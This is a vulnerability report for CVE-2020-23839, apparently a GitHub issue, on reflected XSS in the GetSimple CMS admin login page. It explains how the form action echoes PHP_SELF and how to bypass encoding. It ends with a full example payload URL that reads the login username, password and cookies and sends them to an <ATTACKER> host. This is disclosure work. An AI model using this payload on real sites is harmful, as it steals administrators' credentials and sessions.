CVE-2020-23839: Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' · Issue #1330 · GetSimpleCMS/GetSimpleCMS

Its your myself(false) function (defined in basic.php) that is echo’d into the form action.

• This easily shows the issue when you assign the result to a variable.

Analysis

• Add a variable to see the results of your echo myself(false) function that is injected into the form action.

• Set a breakpoint on line 32 & 33 of the /admin/index.php page.

• Step into the myself function. If false, the result is:

return htmlentities(basename($_SERVER[‘PHP_SELF’]), ENT_QUOTES);

• See here that:

$_SERVER[PHP_SELF’] = “/admin/index.php/breakout”

• The PHP function basename() “Returns trailing name component of path”

https://www.php.net/manual/en/function.basename.php

• Since there is no GET arguments sent in the request:

$_SERVER[‘QUERY_STRING’] = “”

As a final result, we end up with:

The above “breakout?” is HTML Encoded, but since it’s already the action of a form, it will execute javascript put there when the form is posted.

The ‘?’ at the end presents some initial complications, but it can be discarded out as a comment by adding ‘//’ at the end (URL Encoded).

The HTML Encoding can also be bypassed, as since its JavaScript, you can just use decodeURIComponent() to get any character back you want to use.

Example Payload to steal username and password:

http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome “+username+"! Sending your credentails and session to a remote attacker!”);window.location.replace(“test”);%2f%2f